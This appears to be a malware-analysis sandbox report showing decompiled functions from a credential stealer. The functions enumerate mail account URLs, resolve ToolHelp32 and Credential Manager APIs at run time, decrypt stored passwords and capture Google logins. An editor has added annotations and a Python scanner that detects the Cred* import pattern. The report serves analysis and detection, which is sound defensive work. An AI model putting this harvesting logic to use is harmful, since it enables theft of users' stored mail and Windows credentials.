	_t101 = _t100 + 0xc;
	if(_t39 == 0) {
		L9:
		/* iterate over the account records held at _t89 + 0x468 (count at +0x474) */
		_a4 = 0;
		if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
			while(1) {
				_t91 = E0040DA96(_a4, _t89 + 0x468);
				_v620 = 0;
				memset( &_v619, 0, 0x261);
				_v1232 = 0;
				memset( &_v1231, 0, 0x261);
				_t17 = _t91 + 0x104; // 0x104
				_t18 = _t91 + 0x204; // 0x204
				sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
				_t20 = _t91 + 0x104; // 0x104
				_t21 = _t91 + 0x204; // 0x204
				sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
				_t55 = 0;
				_t101 = _t101 + 0x38;
				if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				/* case-insensitive compare of the built "mailbox://" URL with the input (_stricmp) */
				_push(_t55);
				_t56 =  &_v620;
				_push(_t56);
				L00412072();
				if(_t56 == 0) {
					goto L18;
				}
				_t63 = 0;
				if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
					_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
				}
				/* same compare for the "imap://" form */
				_push(_t63);
				_t64 =  &_v1232;
				_push(_t64);
				L00412072();
				if(_t64 != 0) {
					L19:
					_a4 = _a4 + 1;
					_t62 = _v8;
					if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
						_t89 = _t62;
						continue;
					} else {
					}
				} else {
					goto L18;
				}
				goto L22;
				L18:
				/* on a match, if the input ends with '~' (0x7e), copy up to 0xff bytes into the record at +0x304 */
				if( *((char*)(E00406B3E( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
					E0040132A(_t59 + 1, _t91 + 0x304, 0xff);
				} else {
					goto L19;
				}
				goto L22;
			}
		}
	} else {
		if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
			_t69 = 0;
		} else {
			_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
		}
		/* prefix check: does the input start with "imap://" (7 chars)? */
		_push(7);
		_push("imap://");
		_push(_t69);
		L004120D2();
		_t101 = _t101 + 0xc;
		if(_t69 == 0) {
			goto L9;
		}
	}
	L22:
	return 1;
}
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cee4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cebf
                                                                                                                                                                  0x0040cecd
                                                                                                                                                                  0x0040cef2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cecd
                                                                                                                                                                  0x0040cdfe
                                                                                                                                                                  0x0040cdbd
                                                                                                                                                                  0x0040cdc0
                                                                                                                                                                  0x0040cdcc
                                                                                                                                                                  0x0040cdc2
                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                  0x0040cdc7
                                                                                                                                                                  0x0040cdce
                                                                                                                                                                  0x0040cdd0
                                                                                                                                                                  0x0040cdd5
                                                                                                                                                                  0x0040cdd6
                                                                                                                                                                  0x0040cddb
                                                                                                                                                                  0x0040cde0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040cde0
                                                                                                                                                                  0x0040cef8
                                                                                                                                                                  0x0040ceff

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                  • API String ID: 2822975062-2229823034
                                                                                                                                                                  • Opcode ID: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                  • Instruction ID: b4ee7e9bcea435462912fc28dba82f8fd87397000d83f7605d7513f68c800710
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C417E72604205EFD724DBA4C9C1F96B7E8AF18304F00467BE64AE3281D778F995CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E0040820D(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                                                  				void _v4103;
                                                                                                                                                                  				char _v4104;
                                                                                                                                                                  				char _t30;
                                                                                                                                                                  				struct HMENU__* _t32;
                                                                                                                                                                  				char _t39;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				struct HWND__* _t43;
                                                                                                                                                                  				struct HMENU__* _t48;
                                                                                                                                                                  
                                                                                                                                                                  				_t42 = __edi;
                                                                                                                                                                  				_t38 = __ecx;
                                                                                                                                                                  				E00412360(0x1004, __ecx);
                                                                                                                                                                  				_t55 = _a8 - 4;
                                                                                                                                                                  				if(_a8 != 4) {
                                                                                                                                                                  					__eflags = _a8 - 5;
                                                                                                                                                                  					if(_a8 == 5) {
                                                                                                                                                                  						_t39 =  *0x418488;
                                                                                                                                                                  						__eflags = _t39;
                                                                                                                                                                  						if(_t39 == 0) {
                                                                                                                                                                  							L8:
                                                                                                                                                                  							_push(_t42);
                                                                                                                                                                  							sprintf(0x4182c0, "dialog_%d", _a12);
                                                                                                                                                                  							_t43 = CreateDialogParamA(_a4, _a12, 0, E00408208, 0);
                                                                                                                                                                  							_v4104 = 0;
                                                                                                                                                                  							memset( &_v4103, 0, 0x1000);
                                                                                                                                                                  							GetWindowTextA(_t43,  &_v4104, 0x1000);
                                                                                                                                                                  							__eflags = _v4104;
                                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                                  								E00407FBF(__eflags, "caption",  &_v4104);
                                                                                                                                                                  							}
                                                                                                                                                                  							EnumChildWindows(_t43, E00408155, 0);
                                                                                                                                                                  							DestroyWindow(_t43);
                                                                                                                                                                  						} else {
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t30 =  *_t39;
                                                                                                                                                                  								__eflags = _t30;
                                                                                                                                                                  								if(_t30 == 0) {
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t30 - _a12;
                                                                                                                                                                  								if(_t30 != _a12) {
                                                                                                                                                                  									_t39 = _t39 + 4;
                                                                                                                                                                  									__eflags = _t39;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L11;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L8;
                                                                                                                                                                  						}
                                                                                                                                                                  						L11:
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					sprintf(0x4182c0, "menu_%d", _a12);
                                                                                                                                                                  					_t32 = LoadMenuA(_a4, _a12);
                                                                                                                                                                  					 *0x4181b4 =  *0x4181b4 & 0x00000000;
                                                                                                                                                                  					_t48 = _t32;
                                                                                                                                                                  					_push(1);
                                                                                                                                                                  					_push(_t48);
                                                                                                                                                                  					_push(_a12);
                                                                                                                                                                  					E00408065(_t38, _t55);
                                                                                                                                                                  					DestroyMenu(_t48);
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}

APIs
• sprintf.MSVCRT ref: 0040822E
• LoadMenuA.USER32 ref: 0040823C
  • Part of subcall function 00408065: GetMenuItemCount.USER32 ref: 0040807A
  • Part of subcall function 00408065: memset.MSVCRT ref: 0040809B
  • Part of subcall function 00408065: GetMenuItemInfoA.USER32 ref: 004080D6
  • Part of subcall function 00408065: strchr.MSVCRT ref: 004080ED
• DestroyMenu.USER32(00000000), ref: 0040825A
• sprintf.MSVCRT ref: 0040829E
• CreateDialogParamA.USER32(?,00000000,00000000,00408208,00000000), ref: 004082B3
• memset.MSVCRT ref: 004082CF
• GetWindowTextA.USER32 ref: 004082E0
• EnumChildWindows.USER32 ref: 00408308
• DestroyWindow.USER32(00000000), ref: 0040830F
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
• Opcode ID: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
• Instruction ID: bbac317cb8ff6209085768228bd9594f53373bc5c39c5be55c638663b0a3ff3e
• Opcode Fuzzy Hash: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
• Instruction Fuzzy Hash: 33210532540148BFDF12AF60DD45EEF3B68EB55706F0440BEFA41A1190DBB99E948B2D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled from the sample, annotated. Lazily resolves the ToolHelp32 process and
   module enumeration exports of kernel32.dll and caches the function pointers in
   fixed global slots; the global at 0x418514 is a "already resolved" flag. Resolving
   these APIs by name at run time keeps them out of the PE import table, which is
   one reason the import list alone understates what the sample can do. The casts
   on the absolute addresses are added so the decompiler output is valid C. */
#include <windows.h>

void* E0040E6C7() {
	void* _t1;     /* decompiler artifact: eax is returned unchanged on the early exit */
	FARPROC _t2;
	HMODULE _t4;

	if( *(int*)0x418514 != 0) {    /* pointers already cached: nothing to do */
		return _t1;
	}
	_t2 = (FARPROC)GetModuleHandleA("kernel32.dll");
	_t4 = (HMODULE)_t2;
	if(_t4 == 0) {
		L9:
		return (void*)_t2;    /* last resolved pointer, or NULL on failure */
	}
	/* each slot below is a global function pointer; resolution stops at the first
	   export that cannot be found, leaving the "resolved" flag clear */
	_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
	 *(FARPROC*)0x417fe0 = _t2;
	if(_t2 != 0) {
		_t2 = GetProcAddress(_t4, "Module32First");
		 *(FARPROC*)0x417fd8 = _t2;
		if(_t2 != 0) {
			_t2 = GetProcAddress(_t4, "Module32Next");
			 *(FARPROC*)0x417fd4 = _t2;
			if(_t2 != 0) {
				_t2 = GetProcAddress(_t4, "Process32First");
				 *(FARPROC*)0x417e6c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Process32Next");
					 *(FARPROC*)0x417fcc = _t2;
					if(_t2 != 0) {
						 *(int*)0x418514 = 1;    /* all five exports found */
					}
				}
			}
		}
	}
	goto L9;
}


APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E377), ref: 0040E6D6
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E6EF
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E700
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E711
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E722
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E733
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
• Instruction ID: 5b748ad6718b7057422386d5a916c05b319ca6e7afffd602bf2aa3a230b78167
• Opcode Fuzzy Hash: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
• Instruction Fuzzy Hash: E6F086B0AC5306A9E750CB26AD84FAB2DF85B85B81719403BF404F22D4DB7884428B6D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled from the sample, annotated. Fills a caller-supplied table (__eax points
   at it) with Credential Manager exports from advapi32.dll: slot 0 = module handle,
   slot 1 = "ready" flag, slots 2..6 = CredReadA, CredFree, CredDeleteA,
   CredEnumerateA, CredEnumerateW. Only CredReadA and CredFree are mandatory; the
   CredEnumerate* pair is what lets the stealer walk every stored credential, the
   behaviour the report flags as "Tries to steal Mail credentials". E004046CC is the
   subcall listed below that releases the handle via FreeLibrary; its declaration is
   added here so the fragment compiles. The return type was not recovered by the
   decompiler and is taken as int from the returned flag. */
#include <windows.h>

void E004046CC(struct HINSTANCE__** table);    /* forward declaration of the unload subcall */

int E00404651(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
	struct HINSTANCE__* _t12;
	struct HINSTANCE__** _t23;

	_t23 = __eax;
	E004046CC(__eax);                        /* drop any previously loaded handle */
	_t12 = LoadLibraryA("advapi32.dll");
	 *_t23 = _t12;
	if(_t12 != 0) {
		_t23[2] = (struct HINSTANCE__*)GetProcAddress(_t12, "CredReadA");
		_t23[3] = (struct HINSTANCE__*)GetProcAddress( *_t23, "CredFree");
		_t23[4] = (struct HINSTANCE__*)GetProcAddress( *_t23, "CredDeleteA");
		_t23[5] = (struct HINSTANCE__*)GetProcAddress( *_t23, "CredEnumerateA");
		_t23[6] = (struct HINSTANCE__*)GetProcAddress( *_t23, "CredEnumerateW");
		if(_t23[2] == 0 || _t23[3] == 0) {
			E004046CC(_t23);                 /* required exports missing: unload again */
		} else {
			_t23[1] = (struct HINSTANCE__*)1;    /* mark the table as usable */
		}
	}
	return (int)_t23[1];
}


APIs
• Part of subcall function 004046CC: FreeLibrary.KERNEL32(?,00404659,?,0040DC5F,80000001,7479F420), ref: 004046D3
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,7479F420), ref: 0040465E
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
• GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
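The API list above shows the sample loading advapi32.dll at run time and resolving the Credential Manager functions (CredReadA, CredEnumerateA/W, CredDeleteA, CredFree) by name rather than through its import table, which is how a credential-stealing module keeps those names out of a static import scan. The following is an added detection-side example written by the editor; it is not code from the report, the sample or any named tool. It runs the string pattern from this entry over a raw memory image given as bytes. The three-name threshold, the Verdict type and both sample buffers are the editor's constructions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Names taken from the API / String ID lines of this function's report entry.
CRED_API_NAMES: Tuple[str, ...] = (
    "CredReadA", "CredFree", "CredDeleteA", "CredEnumerateA", "CredEnumerateW",
)
LOADER_NAMES: Tuple[str, ...] = ("LoadLibraryA", "GetProcAddress")


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Return printable-ASCII runs of at least min_len bytes, like `strings -n`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


@dataclass(frozen=True)
class Verdict:
    matched_apis: Tuple[str, ...]
    has_advapi32: bool
    has_loader: bool

    def is_hit(self, min_apis: int = 3) -> bool:
        """Fire only on the full pattern: the DLL name, both loader APIs and at
        least min_apis Credential Manager names. Legitimate software (password
        managers, sync agents) also enumerates credentials, so a hit is a
        triage signal to pair with other indicators, not proof on its own."""
        return self.has_advapi32 and self.has_loader and len(self.matched_apis) >= min_apis


def scan_dump(blob: bytes) -> Verdict:
    """Evaluate the dynamic Credential Manager import pattern over a memory image."""
    found = set(extract_strings(blob))
    lowered = {s.lower() for s in found}
    # LoadLibraryA is case-insensitive, so "ADVAPI32.dll" must count as well.
    has_advapi32 = any(s in ("advapi32.dll", "advapi32") for s in lowered)
    has_loader = all(name in found for name in LOADER_NAMES)
    matched = tuple(name for name in CRED_API_NAMES if name in found)
    return Verdict(matched, has_advapi32, has_loader)


# Constructed stand-in for a dump (not data from the report): the string table a
# binary carries when it resolves these APIs by name, with filler bytes around it.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"advapi32.dll\x00CredReadA\x00CredFree\x00CredDeleteA\x00"
    + b"CredEnumerateA\x00CredEnumerateW\x00"
    + b"\x90\x90\xcc"
    + b"KERNEL32.dll\x00LoadLibraryA\x00GetProcAddress\x00"
)
# Constructed benign-looking buffer: dynamic loading of advapi32 with no Cred* names.
BENIGN_DUMP = b"advapi32.dll\x00RegOpenKeyExA\x00LoadLibraryA\x00GetProcAddress\x00"

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        verdict = scan_dump(blob)
        print(label, "hit" if verdict.is_hit() else "clean", verdict.matched_apis)
```

Run it against a process dump (for instance the .sdmp listed under Memory Dump Source, read as bytes) rather than the on-disk file: the report notes the sample unpacks and hollows a process, so the decoded strings are only reliably present in memory.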
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
• Instruction ID: ff9940379d8f3ddc00738bb66027861fd390550b24bba25458702abe812256fc
• Opcode Fuzzy Hash: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
• Instruction Fuzzy Hash: 1F012CB0A447019ACB30AF75C809B56BAF4AF94705B218D2EE1C5A36A0E77E9181CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
E004116BE(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
	/* Decompiler output. The comments are the editor's reading of the control
	   flow; the roles of the internal callees (E0040BE2A, E00405364, ...) are
	   inferred from the call pattern and buffer sizes, not confirmed by the report. */
	void _v8;
	void _v12;
	void _v24;
	char _v39;
	void _v40;
	char _v132;
	void _v1156;
	void _v1172;
	char _v1180;
	void _v1187;
	char _v1188;
	void _v2228;
	void _v2243;
	void _v2244;
	void _v3267;
	char _v3268;
	void _v4291;
	char _v4292;
	char _v5340;
	void _v5347;
	char _v5348;
	char _v6116;
	char _v7136;
	void _v7140;
	void* __edi;
	void* __esi;
	int _t86;
	void* _t109;
	void* _t122;
	void* _t135;
	char _t156;
	signed char _t168;
	signed int _t171;
	intOrPtr _t177;
	signed int _t183;
	void* _t185;
	/* added: temporaries used below that the decompiler left undeclared */
	intOrPtr _t67;
	void* _t181;
	int _t193;

	_t171 = __edx;
	E00412360(0x1be4, __ecx);                       /* stack probe for the ~7 KB frame */
	_t156 = 0;
	_v3268 = 0;
	memset( &_v3267, 0, 0x3ff);
	_a8 = E00411533(_a8,  &_v3268);                 /* decodes _a8 into _v3268; the return value is used as the byte length below */
	_t86 = strlen(_a4);                             /* _a4 is a NUL-terminated string, most likely the key / password */
	_v8 = _t86;
	if(_a8 > 4) {                                   /* needs more than 4 decoded bytes: 4 of them are the trailer compared at the end */
		_t193 = _t86;
		if(_t86 > 0) {                              /* empty key: nothing to derive from */
			asm("movsd");
			asm("movsd");
			asm("movsb");
			_v2244 = 0;
			memset( &_v2243, 0, 0x41e);
			_v1188 = 0;
			memset( &_v1187, 0, 0x41e);
			_v5348 = 0;
			memset( &_v5347, 0, 0x41e);
			_v40 = 0;
			asm("stosd");
			asm("stosd");
			asm("stosd");
			asm("stosw");
			asm("stosb");
			_v4292 = 0;
			memset( &_v4291, 0, 0x3ff);
			/* E0040BE2A / E0040BE4E / E0040BEEC follow an init / update / final
			   pattern and their output is consumed 16 bytes at a time, i.e. a
			   128-bit digest. Each round feeds the previous digest (plus 8 bytes
			   from _v24) back in (0x18, then 0x28 input bytes): an iterated-hash
			   key derivation from _a4 (inferred). */
			E0040BE2A( &_v132);
			E0040BE4E(_v8,  &_v132, _a4);
			_t181 =  &_v132;
			E0040BEEC( &_v39,  &_v132,  &_v2244);
			memcpy( &_v2228,  &_v24, 8);
			E0040BE2A( &_v132);
			_push( &_v2244);
			_t109 = 0x18;
			E0040BE4E(_t109,  &_v132);
			E0040BEEC( &_v39, _t181,  &_v1188);
			memcpy( &_v1172,  &_v2244, 0x10);
			memcpy( &_v1156,  &_v24, 8);
			E0040BE2A(_t181);
			_push( &_v1188);
			_t122 = 0x28;
			E0040BE4E(_t122, _t181);
			E0040BEEC( &_v39, _t181,  &_v5348);
			E00405364( &_v6116, _t193,  &_v1180,  &_v5348);   /* key schedule from the derived material (inferred) */
			E004053E0( &_v5340,  &_v1188,  &_v4292,  &_v6116); /* one block transform; the 8-byte stride below points to a 64-bit block cipher (inferred) */
			_t177 = _a8;
			asm("cdq");
			_t183 = _t177 + (_t171 & 0x00000007) >> 3;      /* cdq + "and 7" is the compiler idiom for signed len / 8: number of whole 8-byte blocks */
			_a4 = 0;
			if(_t183 > 0) {
				do {                                        /* one 8-byte block per iteration, each chained to the previous output */
					E004053E0(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
					_a4 =  &(_a4[1]);
				} while (_a4 < _t183);
				_t177 = _a8;
			}
			_t135 = 0;
			if(_t177 > _t156) {
				do {                                        /* byte-wise XOR of the decoded input with the generated blocks, i.e. a stream-style unmasking */
					_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
					_t135 = _t135 + 1;
					 *(_t185 + _t135 - 0x1be1) = _t168;
				} while (_t135 < _t177);
			}
			 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;     /* NUL-terminate the result */
			strcpy(_a12,  &_v7136);                          /* hand the plaintext to the caller's buffer */
			E0040BE2A( &_v132);
			_t67 = _t177 - 4; // 0x0
			E0040BE4E(_t67,  &_v132, _a12);                  /* digest over the plaintext minus its last 4 bytes */
			E0040BEEC(_t177,  &_v132,  &_v40);
			memcpy( &_v8,  &_v40, 4);
			memcpy( &_v12,  &_v7140, 4);
			_t156 = 1;
			/* *_a16 = 1 when the first 4 digest bytes equal the 4 bytes read from
			   _v7140, so the output is an integrity verdict. Note _v7140 sits
			   4 bytes below the plaintext buffer in this decompilation; given the
			   len-4 digest input, a trailing 4-byte checksum compare is the likely
			   intent, and the offset may be a decompiler artifact. */
			 *_a16 = 0 | _v8 == _v12;
		}
	}
	return _t156;                                            /* 1 = decoded and checked, 0 = input too short or empty key */
}

(Instruction address column for E004116BE, 0x004116be .. 0x00411824 in this excerpt; the disassembly text alongside these addresses was not preserved.)
                                                                                                                                                                  0x00411830
                                                                                                                                                                  0x0041184f
                                                                                                                                                                  0x00411867
                                                                                                                                                                  0x0041186c
                                                                                                                                                                  0x00411871
                                                                                                                                                                  0x00411879
                                                                                                                                                                  0x00411881
                                                                                                                                                                  0x00411884
                                                                                                                                                                  0x00411886
                                                                                                                                                                  0x004118a1
                                                                                                                                                                  0x004118a6
                                                                                                                                                                  0x004118ac
                                                                                                                                                                  0x004118af
                                                                                                                                                                  0x004118af
                                                                                                                                                                  0x004118b2
                                                                                                                                                                  0x004118b6
                                                                                                                                                                  0x004118b8
                                                                                                                                                                  0x004118bf
                                                                                                                                                                  0x004118c6
                                                                                                                                                                  0x004118c9
                                                                                                                                                                  0x004118c9
                                                                                                                                                                  0x004118b8
                                                                                                                                                                  0x004118dc
                                                                                                                                                                  0x004118e3
                                                                                                                                                                  0x004118eb
                                                                                                                                                                  0x004118f3
                                                                                                                                                                  0x004118f9
                                                                                                                                                                  0x00411905
                                                                                                                                                                  0x00411914
                                                                                                                                                                  0x00411926
                                                                                                                                                                  0x0041193e
                                                                                                                                                                  0x0041193f
                                                                                                                                                                  0x0041193f
                                                                                                                                                                  0x00411714
                                                                                                                                                                  0x00411947

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004116E3
                                                                                                                                                                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                                                                                                                                                                  • strlen.MSVCRT ref: 004116FF
                                                                                                                                                                  • memset.MSVCRT ref: 00411739
                                                                                                                                                                  • memset.MSVCRT ref: 0041174D
                                                                                                                                                                  • memset.MSVCRT ref: 00411761
                                                                                                                                                                  • memset.MSVCRT ref: 00411787
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                                                                                                                                                                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                                                                                                                                                                  • memcpy.MSVCRT ref: 004117BE
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                                                                                                                                                                  • memcpy.MSVCRT ref: 004117FA
                                                                                                                                                                  • memcpy.MSVCRT ref: 0041180C
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 004118E3
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411914
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411926
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset$strlen$strcpy
                                                                                                                                                                  • String ID: salu
                                                                                                                                                                  • API String ID: 2660478486-4177317985
                                                                                                                                                                  • Opcode ID: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                                                                                                                                                                  • Instruction ID: f1a42822f8ef7e9ef4ab6207fa972415b32dae4f069819a41f3cbfc12677ad8b
                                                                                                                                                                  • Opcode Fuzzy Hash: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 84717E7290011DAACB10EB95CC81ADE77BDFF08348F1445BAF648E7151DB749B888F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404292(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				char _v280;
                                                                                                                                                                  				char _v408;
                                                                                                                                                                  				intOrPtr _v412;
                                                                                                                                                                  				char _v796;
                                                                                                                                                                  				intOrPtr _v800;
                                                                                                                                                                  				char _v928;
                                                                                                                                                                  				char _v940;
                                                                                                                                                                  				wchar_t* _t23;
                                                                                                                                                                  				char* _t41;
                                                                                                                                                                  				wchar_t** _t59;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  
                                                                                                                                                                  				_t76 = __fp0;
                                                                                                                                                                  				_t59 = _a4;
                                                                                                                                                                  				_t23 =  *_t59;
                                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                                  				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                                                                                                                                  					E00402197( &_v940);
                                                                                                                                                                  					_v800 = 7;
                                                                                                                                                                  					_v412 = 3;
                                                                                                                                                                  					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                                                                                                                                  					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                                                                                                                                  					strcpy( &_v928,  &_v408);
                                                                                                                                                                  					strcpy( &_v796,  &_v408);
                                                                                                                                                                  					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                                                                                                                                  						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t41 = strchr( &_v928, 0x40);
                                                                                                                                                                  					if(_t41 != 0) {
                                                                                                                                                                  						 *_t41 = 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					E004023C6( &_v940, _t76, _v8 + 0xfffff788);
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}

Instruction addresses for E00404292: 0x00404292 through 0x004043c0

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcsstr.MSVCRT ref: 004042C7
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 0040430E
